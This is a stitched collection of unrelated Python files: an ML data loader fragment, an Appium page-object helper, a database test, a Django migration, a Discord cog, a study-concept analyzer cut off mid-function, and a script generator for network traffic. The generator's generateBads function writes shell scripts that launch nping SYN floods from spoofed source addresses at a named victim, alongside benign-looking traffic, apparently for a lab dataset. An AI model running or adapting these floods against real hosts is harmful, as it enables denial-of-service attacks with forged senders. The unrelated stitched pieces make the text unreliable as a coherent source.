        "x_test": x_test.to_numpy(),
        "y_test": np.ones(len(x_test)).ravel(),
    }
def load_files(path_to_data):
    """Load every CSV file found in a data directory.

    Files whose name contains "input" populate the "input" key; any other
    file is treated as the target file. If several files match the same
    category, the last one read wins.

    Args:
        path_to_data (str): path of the data root directory.

    Returns:
        dict: mapping "input"/"target" to a pandas DataFrame.
    """
    data = {}
    data_files = os.listdir(path_to_data)
    # tqdm only adds a progress bar over the directory listing.
    for datafile in tqdm.tqdm(data_files):
        if "input" in datafile:
            data["input"] = pd.read_csv(
                os.path.join(path_to_data, datafile), delimiter=",", decimal="."
            )
        else:
            data["target"] = pd.read_csv(
                os.path.join(path_to_data, datafile), delimiter=",", decimal="."
            )
    return data
def remove_useless_features(training_data):
    """Drop the non-predictive ``_ID`` column from every dataframe.

    Args:
        training_data (dict): mapping of split name -> pandas DataFrame.

    Returns:
        dict: same keys, each DataFrame without its ``_ID`` column.
    """
    return {
        key: frame.drop(columns=["_ID"])
        for key, frame in training_data.items()
    }
def create_x_and_y(input_data, valid_ratio):
    """Generate train and validation arrays from one file's data.

    Args:
        input_data (dict): "input" (features) and "target" DataFrames.
        valid_ratio (float): fraction of rows held out for validation.

    Returns:
        dict: x_train / y_train / x_valid / y_valid numpy arrays.
    """
    # Deterministic split (fixed random_state) so runs are reproducible.
    x_tr, x_va, y_tr, y_va = train_test_split(
        input_data["input"],
        input_data["target"],
        test_size=valid_ratio,
        random_state=0,
    )
    return {
        "x_train": x_tr.to_numpy(),
        "y_train": y_tr.values.ravel(),
        "x_valid": x_va.to_numpy(),
        "y_valid": y_va.values.ravel(),
    }
| 3,922 | 1,241 |
from .content import SinglePost
from .page import Page, MainPage
| 65 | 17 |
# coding=utf-8
"""
@author:songmengyun
@file: base_page.py
@time: 2020/01/03
"""
import time
import logging
from selenium.webdriver.common.by import By
from appium.webdriver.common.touch_action import TouchAction
from selenium.webdriver.support.wait import WebDriverWait
from appium.webdriver.mobilecommand import MobileCommand
from appium.webdriver.connectiontype import ConnectionType
from poseidon.ui.util.location import *
from poseidon.base import CommonBase as cb
from poseidon.ui.mobile.android.android_keycode import KEYCODE
class Swipe:
    '''Screen-swipe helpers (swipe up/down/left/right in fractions of the
    screen size). All four public methods share one private driver loop.'''

    def __init__(self, driver):
        # driver: appium/selenium webdriver exposing swipe(x1, y1, x2, y2).
        self.driver = driver

    def _do_swipes(self, intro_msg, x1, y1, x2, y2, n):
        """Log *intro_msg*, then swipe from (x1, y1) to (x2, y2) *n* times.

        Sleeps 3s before the first swipe and before each one, mirroring the
        original pacing so UI animations can settle between swipes.
        """
        logging.info(intro_msg)
        time.sleep(3)
        logging.info("滑动前")
        for i in range(n):
            logging.info("第%d次滑屏" % i)
            time.sleep(3)
            self.driver.swipe(x1, y1, x2, y2)

    def swipe_up(self, width, height, n=5):
        '''Swipe up n times: finger moves from 90% to 25% of screen height.'''
        self._do_swipes("定义向上滑动方法",
                        width * 0.5, height * 0.9, width * 0.5, height * 0.25, n)

    def swipe_down(self, width, height, n=5):
        '''Swipe down n times: finger moves from 25% to 90% of screen height.'''
        self._do_swipes("定义向下滑动方法",
                        width * 0.5, height * 0.25, width * 0.5, height * 0.9, n)

    def swipe_left(self, width, height, n=5):
        '''Swipe left n times: finger moves from 80% to 20% of screen width.'''
        self._do_swipes("定义向左滑动方法",
                        width * 0.8, height * 0.5, width * 0.2, height * 0.5, n)

    def swipe_right(self, width, height, n=5):
        '''Swipe right n times: finger moves from 20% to 80% of screen width.'''
        self._do_swipes("定义向右滑动方法",
                        width * 0.2, height * 0.5, width * 0.8, height * 0.5, n)
class Action:
    '''Notification-bar operations and element lookup helpers.'''

    # Dispatch table replacing two duplicated 8-way if/elif chains:
    # locator strategy -> (single finder, multi finder, log label).
    # The finder functions come from poseidon.ui.util.location.
    _FINDERS = {
        By.ID: (findId, findsId, 'id'),
        By.XPATH: (findXpath, findsXpath, 'xpath'),
        By.LINK_TEXT: (findLinkText, findsLinkText, 'link text'),
        By.PARTIAL_LINK_TEXT: (findPLinkText, findsPLinkText, 'partial link text'),
        By.NAME: (findName, findsName, 'name'),
        By.TAG_NAME: (findTagName, findsTagName, 'tag name'),
        By.CLASS_NAME: (findClassName, findsClassName, 'class name'),
        By.CSS_SELECTOR: (findCss, findsCss, 'css selector'),
    }

    def __init__(self, driver):
        self.driver = driver
        self.action = TouchAction(self.driver)

    def _find(self, locator, multiple):
        """Shared lookup: dispatch on locator[0]. Returns None (after
        logging an error) for an unknown strategy, matching the original
        if/elif chains."""
        entry = self._FINDERS.get(locator[0])
        if entry is None:
            logging.error("错误的locator_type,请确认")
            return None
        single, multi, label = entry
        logging.debug("使用 {0} 定位元素 ==> {1}".format(label, locator[1]))
        finder = multi if multiple else single
        return finder(self.driver, locator[1])

    def get_element(self, locator):
        """
        Return a single selenium WebElement for the given locator.
        :param locator: (By.<strategy>, value) pair
        :return: WebElement, or None for an unknown strategy
        """
        return self._find(locator, multiple=False)

    def get_elements(self, locator):
        """
        Return the list of selenium WebElements for the given locator.
        :param locator: (By.<strategy>, value) pair
        :return: list of WebElements, or None for an unknown strategy
        """
        return self._find(locator, multiple=True)

    def set_touch_pwd(self, locator):
        '''
        Draw a gesture-unlock pattern.
        :param locator: locator of the first touch point; its location and
            size anchor the rest of the pattern.
        :return:
        '''
        start = self.get_element(locator)
        start_height = start.size['height']
        start_width = start.size['width']
        start_x = start.location['x']
        start_y = start.location['y']
        # Centre of the first cell; later points are offset by two cell
        # widths/heights, tracing an L-shaped pattern.
        begin_x = start_x + start_width / 2
        begin_y = start_y + start_height / 2
        action = TouchAction(self.driver)
        action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\
            move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\
            move_to(x=begin_x, y=start_y + start_height * 2).release().perform()

    def adjust_volume(self, size):
        '''Adjust system volume up or down (not implemented yet).'''

    def adjust_brightness(self, size):
        '''Adjust screen brightness up or down (not implemented yet).'''

    def clean_notification_bar_message(self):
        '''Clear notification-bar messages (currently only opens the bar).'''
        self.driver.open_notifications()

    def open_close_wifi(self):
        '''Toggle Wi-Fi (not implemented yet).'''

    def airplane_mode(self):
        '''Enable airplane mode (not implemented yet).'''
class KeyEvent:
    '''Hardware key-press events.'''
    def __init__(self, driver):
        self.driver = driver
    def volume(self, size:int) -> None:
        '''Press the volume key abs(size) times: up when size >= 0, down when negative.'''
        if size >=0:
            for i in range(0, size):
                self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP)  # volume up key
        else:
            for i in range(size, 0):
                self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN)  # volume down key
        # NOTE(review): BACK is pressed unconditionally after every volume
        # adjustment -- this looks accidental (possibly a stray line);
        # confirm whether any caller relies on it before removing.
        self.driver.press_keycode(KEYCODE.KEYCODE_BACK)  # back key
class AssertBase:
    '''Assertion helpers for page objects.'''
    def __init__(self, driver):
        self.driver = driver
    @cb.com_try_catch
    def check_current_activity(self, app_activity):
        '''Assert that the device's current activity equals *app_activity*;
        logs an error instead when no current activity is available.'''
        current_activity = self.driver.current_activity
        if current_activity:
            cb.checkEqual(current_activity, app_activity)
        else:
            logging.error('当前没有app_activity')
class BasePage(Swipe, Action, KeyEvent, AssertBase):
    '''General-purpose page helpers combining the swipe/action/key/assert mixins.'''
    def __init__(self, driver):
        self.driver = driver
        # Single super() call walks the MRO so every mixin gets the driver.
        super().__init__(driver=self.driver)
    @cb.com_try_catch
    def install_app(self, app_path:str, app_package:str):
        '''
        Install the APK only when it is not already installed.
        :param app_path: path to the APK file
        :param app_package: package name of the APK
        :return:
        '''
        if self.driver.is_app_installed(app_package):
            logging.info(f'{app_package}已安装')
        else:
            self.driver.install_app(app_path)
            logging.info(f'{app_package}安装成功')
    @cb.com_try_catch
    def uninstall_app(self, app_package:str):
        '''
        Uninstall the app only when it is currently installed.
        :param app_package: package name of the APK
        :return:
        '''
        if self.driver.is_app_installed(app_package):
            self.driver.remove_app(app_package)
            logging.info(f'{app_package}卸载成功')
        else:
            logging.info(f'{app_package}已卸载')
    @cb.com_try_catch
    def open_app(self, app_package:str, app_activity:str) -> None:
        '''
        Open an activity in the current app, or start a new app on that activity.
        :param app_package: package to open
        :param app_activity: activity to open
        :return:
        '''
        logging.info(f'当前activity: {self.driver.current_activity}')
        self.driver.start_activity(app_package, app_activity)
        logging.info(f'当前activity: {self.driver.current_activity}')
    def app_strings(self):
        '''Return the application's (English) string resources.'''
        string = self.driver.app_strings(language='en')
        return string
    @cb.com_try_catch
    def get_app_package_info(self):
        """
        :return: [current package name, current activity name]
        """
        return [self.driver.current_package, self.driver.current_activity]
    @cb.com_try_catch
    def get_window_info(self):
        '''Return the screen size as [width, height].'''
        size = self.driver.get_window_size()
        width = size['width']
        height = size['height']
        return [width, height]
    def lock_app(self):
        '''Lock the screen for 5 seconds.'''
        self.driver.lock(5)
    def hide_keyboard(self):
        '''Dismiss the on-screen keyboard.'''
        self.driver.hide_keyboard()
    def shake_app(self):
        '''Simulate shaking the device.'''
        self.driver.shake()
    def current_content(self):
        '''Return the current context (e.g. NATIVE_APP or a webview name).'''
        current_content = self.driver.current_context  # the active context
        # NOTE(review): appium drivers expose `contexts` (plural) for the list
        # of available contexts; `contents` looks like a typo that would raise
        # AttributeError at runtime -- confirm against the appium client used.
        current_contents = self.driver.contents  # list all available contexts
        return current_content
    @cb.com_try_catch
    def backgroup_app(self, seconds:int, restart=True):
        '''Send the app to the background for *seconds*; no-op when restart is not True.'''
        if restart == True:
            self.driver.background_app(seconds)
        else:
            pass
    @cb.com_try_catch
    def wait(self, fun, timeout=10, fre=1):
        '''
        Explicit wait: poll *fun* every *fre* seconds up to *timeout*.
        :return:
        '''
        wait = WebDriverWait(self.driver, timeout, fre)
        wait.until(fun)
    @cb.com_try_catch
    def click_element(self, locator, is_button=True):
        """
        Click an element: plain WebElement.click() for buttons, otherwise a
        TouchAction tap (useful for non-button widgets).
        :param locator:
        :param is_button:
        :return:
        """
        element = self.get_element(locator)
        if is_button:
            element.click()
        else:
            element = self.get_element(locator)
            TouchAction(self.driver).tap(element).perform()
    @cb.com_try_catch
    def set_text(self, locator, values):
        """
        Clear a text field, then type *values* into it.
        :param locator:
        :param values:
        :return:
        """
        text_field = self.get_element(locator)
        text_field.clear()
        text_field.send_keys(values)
    def clean_app_cash(self,app_package):
        '''Clear the app cache (not implemented yet).'''
    def is_displayed(self, locator, mark=True):
        """
        Return whether the element is displayed; optionally highlight it first.
        :param locator:
        :return:
        """
        element = self.get_element(locator)
        if mark:
            self.hight_light(element)
        return element.is_displayed()
    def hight_light(self, element, times=2, seconds=2, color="red", border=2):
        """
        Highlight a WebElement by briefly drawing a colored border via JS.
        :param element:
        :param times: how many times to run the highlight script
        :param seconds:
        :return:
        """
        # The JS saves the original style, applies a border, and restores the
        # style after 1s; exceptions (e.g. stale element) are only logged.
        js = "element = arguments[0]; " \
             "original_style = element.getAttribute('style'); " \
             "element.setAttribute('style', original_style + \";" \
             "border: %spx solid %s;\");" \
             "setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" %(border,color)
        try:
            for i in range(0, times):
                self.driver.execute_script(js, element)
        except Exception as e:
            logging.error(e)
    def switch_h5_app(self, context):
        # Switch into an H5/webview context by name.
        self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context})
    def find_item(self, el):
        '''Return True when *el* appears in the current page source.'''
        logging.info(f'验证页面元素:{el} 是否存在')
        source = self.driver.page_source
        if el in source:
            return True
        else:
            return False
| 12,619 | 4,573 |
import celery
from nose.tools import assert_equal, assert_true
from datetime import datetime
from wikimetrics.models import TaskErrorStore, ReportStore
from ..fixtures import DatabaseTest
class TaskErrorStoreTest(DatabaseTest):
    """Tests for TaskErrorStore.add: creating vs. updating error rows."""
    def setUp(self):
        # Every test needs a pending report to attach errors to.
        DatabaseTest.setUp(self)
        self.report = ReportStore(status=celery.states.PENDING)
        self.session.add(self.report)
        self.session.commit()
    def test_add_new(self):
        # If the failing report has no previous errors,
        # a new task error should be created.
        # Capture a [t1, t2] window (second precision, matching the DB
        # column) to bound the stored timestamp.
        t1 = datetime.now().replace(microsecond=0)
        TaskErrorStore.add('report', self.report.id, 'message', 'traceback')
        t2 = datetime.now().replace(microsecond=0)
        row = self.session.query(TaskErrorStore).first()
        assert_equal(row.task_type, 'report')
        assert_equal(row.task_id, self.report.id)
        assert_true(row.timestamp >= t1 and row.timestamp <= t2)
        assert_equal(row.message, 'message')
        assert_equal(row.traceback, 'traceback')
        assert_equal(row.count, 1)
    def test_add_existing(self):
        # If the failing report has previous errors,
        # the existing task error should be updated.
        t1 = datetime.now()
        te = TaskErrorStore(task_type='report', task_id=self.report.id, count=1,
                            timestamp=t1, message='message', traceback='traceback')
        self.session.add(te)
        self.session.commit()
        TaskErrorStore.add('report', self.report.id, 'message2', 'traceback2')
        t2 = datetime.now()
        row = self.session.query(TaskErrorStore).first()
        # Python 2 debug print left by the author (this module is py2).
        print t1, row.timestamp, t2
        assert_equal(row.task_type, 'report')
        assert_equal(row.task_id, self.report.id)
        # add() must refresh the timestamp, bump the count and replace the
        # message/traceback rather than inserting a second row.
        assert_true(row.timestamp > t1 and row.timestamp < t2)
        assert_equal(row.message, 'message2')
        assert_equal(row.traceback, 'traceback2')
        assert_equal(row.count, 2)
| 1,957 | 587 |
# Generated by Django 2.0 on 2017-12-20 04:27
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a non-null ``description`` TextField to ``metapuzzle``.

    The literal default is only used to backfill existing rows during this
    migration; ``preserve_default=False`` drops it from the model afterwards.
    """
    dependencies = [
        ('puzzles', '0003_auto_20171219_2002'),
    ]
    operations = [
        migrations.AddField(
            model_name='metapuzzle',
            name='description',
            field=models.TextField(default='What technology should I use to build my spoooooky website? Originally written for Coding Dojo students in October 2017.'),
            preserve_default=False,
        ),
    ]
| 545 | 180 |
from discord.ext import commands
class Testing(commands.Cog):
    """Debug/testing commands restricted to the designated test user."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command()
    async def who(self, ctx):
        """Reply with a greeting naming the invoking user."""
        author = ctx.author
        await ctx.send(f"Hello {author}")

    @commands.command()
    async def debug_free_cash(self, ctx):
        """Grant $1000 to the test user; reject anyone else.

        Bug fix: the original raised *before* the "not authorized" send,
        leaving that message unreachable -- notify the user first, then
        raise to abort the command.
        """
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            await ctx.send("You are not authorized to do that")
            raise ValueError("Unauthorized API usage")
        await ctx.insert_into_inventory(author, "money", 1000)
        await ctx.send("You have been given $1000!")

    @commands.command()
    async def debug_clear(self, ctx):
        """Clear the test user's inventory; reject anyone else.

        Same unreachable-send bug fix as debug_free_cash.
        """
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            await ctx.send("You are not authorized to do that!")
            raise ValueError("Unauthorized API usage")
        await ctx.clear_inventory(author)
| 958 | 294 |
import random
def generateRandomIndex(inputlist):
    '''(list of str)->str

    Return one uniformly random element of *inputlist*.
    '''
    return random.choice(inputlist)
def readHostFile(fileToPen):
    '''(str)->list of str

    Read one host per line, strip whitespace, and return the de-duplicated
    hosts as a list (order unspecified, as with the original set round-trip).
    '''
    # Bug fix: the original left the file handle open; a context manager
    # guarantees it is closed even if reading fails.
    with open(fileToPen, 'r') as host_file:
        return list({line.strip() for line in host_file})
def generateBads(hostsFile, victim):
    """Write attack_<victim>.sh: one backgrounded nping SYN line per spoofed host."""
    with open('attack_' + victim + '.sh', 'w') as script:
        script.write("#!/bin/bash\n\n")
        for source_host in readHostFile(hostsFile):
            command = ('nping --tcp -S ' + source_host + ' -p 80 --flags syn '
                       + victim + ' -c 500 --delay 20ms &\n')
            script.write(command)
def generateScripts(server, host):
    """Generate start_goods.sh plus 10 worker scripts of benign nping traffic.

    Reads server and host lists from the given files, picks up to 7 random
    servers (always adding three fixed destinations), builds 30 single-probe
    SYN lines per host, shuffles them, and spreads them evenly over 10
    worker scripts launched by start_goods.sh.
    """
    serversList = readHostFile(server)
    hostsList = readHostFile(host)
    random.shuffle(serversList)
    serversList = serversList[:7]
    uniqueList = set(serversList)
    # Always include these well-known destinations.
    uniqueList.add('93.184.220.20')
    uniqueList.add('65.54.189.53')
    uniqueList.add('82.199.80.141')
    serversList = list(uniqueList)
    goodsTraffic = []
    for hs in hostsList:
        # generate random traffic for a given host
        for _ in range(30):
            serverName = generateRandomIndex(serversList)
            goodsTraffic.append(
                'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + serverName + ' -c 1\n')
    random.shuffle(goodsTraffic)
    trafficQty = len(goodsTraffic)
    numberOfScripts = 10
    # Bug fix: use floor division -- under Python 3 "/" yields a float and
    # float slice indices raise TypeError. Any remainder lines are dropped,
    # matching the original Python 2 integer-division behaviour.
    avgTrafficPerScript = trafficQty // numberOfScripts
    starter = open('start_goods.sh', 'w')
    starter.write("#!/bin/bash\n\n")
    for i in range(numberOfScripts):
        sname = str(i) + '.sh'
        starter.write('./{0} &\n'.format(sname))
        with open(sname, 'w') as output:
            output.write("#!/bin/bash\n\n")
            begin = i * avgTrafficPerScript
            output.writelines(goodsTraffic[begin:begin + avgTrafficPerScript])
    starter.close()
# Run: build the benign-traffic worker scripts from the default input files.
generateScripts('input.txt','hosts.txt')
# Example attack-script generation (left disabled):
#generateBads('bad_hosts.txt', 'it.fxfeeds.mozilla.com')
| 2,577 | 950 |
# Module metadata for the ``base`` package.
__title__ = 'base'
__author__ = 'Gloryness'
__license__ = 'MIT License'
| 73 | 32 |
import ontotextapi as onto
import utils
import json
from os.path import isfile, join, split
import joblib as jl
import cohortanalysis as cohort
from ann_post_rules import AnnRuleExecutor
import sys
import xml.etree.ElementTree as ET
import concept_mapping
import urllib3
import logging
class StudyConcept(object):
    """A named study concept: surface terms mapped onto an ontology concept
    plus its transitive sub-concept closure. (Python 2 module.)"""
    def __init__(self, name, terms, umls_instance=None):
        self.terms = terms  # surface terms; a '~~' prefix marks terms whose closure is subtracted
        self._name = name
        self._term_to_concept = None  # lazily filled by gen_concept_closure
        self._concept_closure = None  # lazily filled by gen_concept_closure
        self._umls_instance = umls_instance
    def gen_concept_closure(self, term_concepts=None, concept_to_closure=None):
        """
        generate concept closures for all terms
        :param term_concepts: optional - expert verified mappings can be used
        :param concept_to_closure: precomputed concept to closure dictionary
        :return:
        """
        self._term_to_concept = {}
        self._concept_closure = set()
        if term_concepts is None:
            # No curated mappings: ask the ontology service per term
            # (stripping the '~~' negation prefix before matching).
            term_concepts = {}
            for term in self.terms:
                concept_objs = onto.match_term_to_concept(term if not term.startswith("~~") else term[2:])
                if concept_objs is not None:
                    term_concepts[term] = [o['localName'] for o in concept_objs]
        for term in term_concepts:
            candidate_terms = []
            for concept in term_concepts[term]:
                if concept_to_closure is not None:
                    candidate_terms.append((concept, concept_to_closure[concept]))
                else:
                    candidate_terms.append((concept, onto.get_transitive_subconcepts(concept)))
            # pick the candidate concept with the largest closure
            if len(candidate_terms) > 1:
                candidate_terms = sorted(candidate_terms, key=lambda x: -len(x[1]))
            if term.startswith('~~'):
                # negated term: subtract its concept and closure from the set
                to_remove = set(candidate_terms[0][1])
                to_remove.add(candidate_terms[0][0])
                self._concept_closure -= to_remove
                print 'removed %s items' % len(to_remove)
            else:
                self._concept_closure.add(candidate_terms[0][0])
                self._concept_closure |= set(candidate_terms[0][1])
            self._term_to_concept[term] = {'mapped': candidate_terms[0][0], 'closure': len(candidate_terms[0][1])}
    @staticmethod
    def compute_all_concept_closure(all_concepts, umls_instance, skip_relations={}):
        # Fan out closure computation over 40 worker threads; `computed`
        # and `results` are shared accumulators filled by the workers.
        concept_to_closure = {}
        print 'all concepts number %s' % len(all_concepts)
        computed = []
        results =[]
        utils.multi_thread_tasking(all_concepts, 40, StudyConcept.do_compute_concept_closure,
                                   args=[umls_instance, computed, results, skip_relations])
        for r in results:
            concept_to_closure[r['concept']] = r['closure']
        return concept_to_closure
    @staticmethod
    def do_compute_concept_closure(concept, umls_instance, computed, results, skip_relations={}):
        # Worker for compute_all_concept_closure; skips already-seen concepts.
        if concept not in computed:
            closure = umls_instance.transitive_narrower(concept, skip_relations=skip_relations)
            computed.append(concept)
            results.append({'concept': concept, 'closure': closure})
            print 'concept: %s transitive children %s' % (concept, closure)
    @property
    def name(self):
        return self._name
    @property
    def concept_closure(self):
        # Computed on first access.
        if self._concept_closure is None:
            self.gen_concept_closure()
        return self._concept_closure
    @concept_closure.setter
    def concept_closure(self, value):
        self._concept_closure = value
    @property
    def term_to_concept(self):
        # Computed on first access (shares the closure generation pass).
        if self._concept_closure is None:
            self.gen_concept_closure()
        return self._term_to_concept
    @term_to_concept.setter
    def term_to_concept(self, value):
        self._term_to_concept = value
class StudyAnalyzer(object):
    """A named study: its concepts, skip terms and options, plus helpers to
    generate patient-level result tables. (Python 2 module.)"""
    def __init__(self, name):
        self._study_name = name
        self._study_concepts = []  # list of StudyConcept
        self._skip_terms = []      # terms ignored when counting annotations
        self._options = None       # optional dict from study_options.json
    @property
    def study_name(self):
        return self._study_name
    @study_name.setter
    def study_name(self, value):
        self._study_name = value
    @property
    def study_concepts(self):
        return self._study_concepts
    @study_concepts.setter
    def study_concepts(self, value):
        self._study_concepts = value
    @property
    def skip_terms(self):
        return self._skip_terms
    @skip_terms.setter
    def skip_terms(self, value):
        self._skip_terms = value
    def add_concept(self, concept):
        self.study_concepts.append(concept)
    def generate_exclusive_concepts(self):
        """
        it is important to have a set of disjoint concepts otherwise concept-document frequencies would
        contain double-counted results
        :return:
        """
        # call the concept closure property to make sure
        # that the closure has been generated before
        # compute the disjoint
        for sc in self.study_concepts:
            cc = sc.concept_closure
        intersections = {}
        explain_inter = {}
        # Pairwise pass: concepts shared by i and j are removed from the
        # earlier concept (index j), so later concepts keep the overlap.
        for i in range(1, len(self.study_concepts)):
            for j in xrange(i):
                common = self.study_concepts[i].concept_closure & self.study_concepts[j].concept_closure
                if len(common) > 0:
                    intersections[self.study_concepts[i].name + ' - ' + self.study_concepts[j].name] = common
                    self.study_concepts[j].concept_closure -= common
                    explain_inter[self.study_concepts[j].name] = \
                        ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)] \
                            if self.study_concepts[j].name not in explain_inter \
                            else explain_inter[self.study_concepts[j].name] + \
                                 ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)]
        # if len(intersections) > 0:
        #     print 'intersections [[\n%s\n]]' % json.dumps(explain_inter)
        # for sc in self.study_concepts:
        #     print '%s %s' % (sc.name, len(sc.concept_closure))
    def remove_study_concept_by_name(self, concept_name):
        # NOTE(review): removes from the list while iterating it; safe only
        # because at most one match is expected -- confirm.
        for sc in self.study_concepts:
            if sc.name == concept_name:
                self.study_concepts.remove(sc)
    def retain_study_concepts(self, concept_names):
        # Keep only the concepts whose name is in concept_names.
        retained = []
        for sc in self.study_concepts:
            if sc.name in concept_names:
                retained.append(sc)
        self.study_concepts = retained
    def export_mapping_in_json(self):
        # NOTE(review): the built mapping is neither returned nor saved --
        # this method currently has no observable effect beyond triggering
        # lazy term_to_concept computation.
        mapping = {}
        for c in self._study_concepts:
            mapping[c.name] = c.term_to_concept
    def serialise(self, out_file):
        # Touch term_to_concept on every concept so lazy mappings are
        # materialised before pickling.
        print 'iterating concepts to populate the mappings'
        for c in self._study_concepts:
            tc = c.term_to_concept
        print 'saving...'
        jl.dump(self, out_file)
        print 'serialised to %s' % out_file
    @property
    def study_options(self):
        return self._options
    @study_options.setter
    def study_options(self, value):
        self._options = value
    @staticmethod
    def deserialise(ser_file):
        # Inverse of serialise(): load a pickled StudyAnalyzer.
        return jl.load(ser_file)
    def gen_study_table(self, cohort_name, out_file):
        cohort.populate_patient_study_table(cohort_name, self, out_file)
    def gen_sample_docs(self, cohort_name, out_file):
        cohort.random_extract_annotated_docs(cohort_name, self, out_file, 10)
    def gen_study_table_with_rules(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
                                   sql_config, db_conn_file, text_preprocessing=False):
        # SQL-backed study run with post-annotation rules applied.
        sql_setting = get_sql_template(sql_config)
        cohort.populate_patient_study_table_post_ruled(cohort_name, self, out_file, ruler, 20,
                                                       sample_out_file, ruled_out_file,
                                                       sql_setting['patients_sql'], sql_setting['term_doc_anns_sql'],
                                                       sql_setting['skip_term_sql'],
                                                       db_conn_file, text_preprocessing=text_preprocessing)
    def gen_study_table_in_one_iteration(self, cohort_name, out_file, sample_out_file,
                                         sql_config, db_conn_file):
        # Single-pass variant driven by the one-iteration SQL template.
        sql_setting = get_one_iteration_sql_template(sql_config)
        cohort.generate_result_in_one_iteration(cohort_name, self, out_file, 20, sample_out_file,
                                                sql_setting['doc_to_brc_sql'],
                                                sql_setting['brc_sql'],
                                                sql_setting['anns_iter_sql'],
                                                sql_setting['skip_term_sql'],
                                                sql_setting['doc_content_sql'],
                                                db_conn_file)
    def gen_study_table_with_rules_es(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
                                      sem_idx_setting_file, retained_patients_filter, filter_obj=None):
        # Elasticsearch-backed variant of gen_study_table_with_rules.
        cohort.es_populate_patient_study_table_post_ruled(self, out_file, ruler, 20,
                                                          sample_out_file, ruled_out_file, sem_idx_setting_file,
                                                          retained_patients_filter=retained_patients_filter,
                                                          filter_obj=filter_obj)
def get_sql_template(config_file):
    """Read the three SQL statements used by a rule-based study run.

    :param config_file: XML file with term_doc_anns_sql, patients_sql and
        skip_term_sql elements under the root.
    :return: dict mapping each tag name to its SQL text.
    """
    root = ET.parse(config_file).getroot()
    tags = ('term_doc_anns_sql', 'patients_sql', 'skip_term_sql')
    return {tag: root.find(tag).text for tag in tags}
def get_one_iteration_sql_template(config_file):
    """Read the five SQL statements used by a one-iteration study run.

    :param config_file: XML file with the five *_sql elements under the root.
    :return: dict mapping each tag name to its SQL text.
    """
    root = ET.parse(config_file).getroot()
    tags = ('doc_to_brc_sql', 'brc_sql', 'anns_iter_sql',
            'doc_content_sql', 'skip_term_sql')
    return {tag: root.find(tag).text for tag in tags}
def load_ruler(rule_setting_file):
    """Build an AnnRuleExecutor from *rule_setting_file*, falling back to
    the default rule configuration when None is given."""
    ruler = AnnRuleExecutor()
    config_path = ('./studies/rules/_default_rule_config.json'
                   if rule_setting_file is None else rule_setting_file)
    ruler.load_rule_config(config_path)
    return ruler
def load_study_settings(folder, umls_instance,
                        rule_setting_file=None,
                        concept_filter_file=None,
                        do_disjoint_computing=True,
                        export_study_concept_only=False):
    """Load a study folder into a StudyAnalyzer (plus its rule executor).

    Concept sources are tried in priority order: a cached pickle, then
    label2concept.tsv, exact_concepts_mappings.json,
    manual_mapped_concepts.json, and finally study_concepts.json.
    Returns {'study_analyzer': sa, 'ruler': ruler}, or None when
    export_study_concept_only is set (only sc2closure.json is written).
    """
    p, fn = split(folder)
    # Reuse a previously serialised analyzer when available.
    if isfile(join(folder, 'study_analyzer.pickle')):
        sa = StudyAnalyzer.deserialise(join(folder, 'study_analyzer.pickle'))
    else:
        sa = StudyAnalyzer(fn)
    if isfile(join(folder, 'label2concept.tsv')):
        # using tsv file if exists: one "term<TAB>concept" mapping per line,
        # each becoming a single-concept closure.
        logging.info('loading study concepts from tsv file...')
        lines = utils.read_text_file(join(folder, 'label2concept.tsv'))
        scs = []
        for l in lines:
            arr = l.split('\t')
            if len(arr) != 2:
                logging.error('line [%s] not parsable' % l)
                continue
            t = arr[0]
            c = arr[1]
            sc = StudyConcept(t, [t])
            sc.concept_closure = set([c])
            tc = {}
            tc[t] = {'closure': 1, 'mapped': c}
            sc.term_to_concept = tc
            scs.append(sc)
            logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
        sa.study_concepts = scs
        logging.info('study concepts loaded')
    elif isfile(join(folder, 'exact_concepts_mappings.json')):
        # Curated term->concept mappings; closures are generated per term.
        concept_mappings = utils.load_json_data(join(folder, 'exact_concepts_mappings.json'))
        concept_to_closure = None
        # concept_to_closure = \
        #     StudyConcept.compute_all_concept_closure([concept_mappings[t] for t in concept_mappings],
        #                                              umls_instance, skip_relations=skip_closure_relations)
        scs = []
        for t in concept_mappings:
            sc = StudyConcept(t, [t])
            t_c = {}
            t_c[t] = [concept_mappings[t]]
            sc.gen_concept_closure(term_concepts=t_c, concept_to_closure=concept_to_closure)
            scs.append(sc)
            logging.debug(sc.concept_closure)
        sa.study_concepts = scs
        sa.serialise(join(folder, 'study_analyzer.pickle'))
    elif isfile(join(folder, 'manual_mapped_concepts.json')):
        # Expert-verified concepts with precomputed closures.
        mapped_scs = utils.load_json_data(join(folder, 'manual_mapped_concepts.json'))
        scs = []
        for t in mapped_scs:
            sc = StudyConcept(t, [t])
            sc.concept_closure = set(mapped_scs[t]['concepts'])
            tc = {}
            tc[t] = mapped_scs[t]['tc']
            sc.term_to_concept = tc
            scs.append(sc)
            logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
        sa.study_concepts = scs
    else:
        # Fallback: free-text terms per concept name; closures resolved lazily.
        concepts = utils.load_json_data(join(folder, 'study_concepts.json'))
        if len(concepts) > 0:
            scs = []
            for name in concepts:
                scs.append(StudyConcept(name, concepts[name], umls_instance=umls_instance))
                logging.debug('%s, %s' % (name, concepts[name]))
            sa.study_concepts = scs
            sa.serialise(join(folder, 'study_analyzer.pickle'))
    # get filtered concepts only, if filter exists
    if concept_filter_file is not None:
        logging.debug('before removal, the concept length is: %s' % len(sa.study_concepts))
        concept_names = utils.load_json_data(concept_filter_file)
        sa.retain_study_concepts(concept_names)
        logging.debug('after removal: %s' % len(sa.study_concepts))
    # compute disjoint concepts (avoids double counting across concepts)
    if do_disjoint_computing:
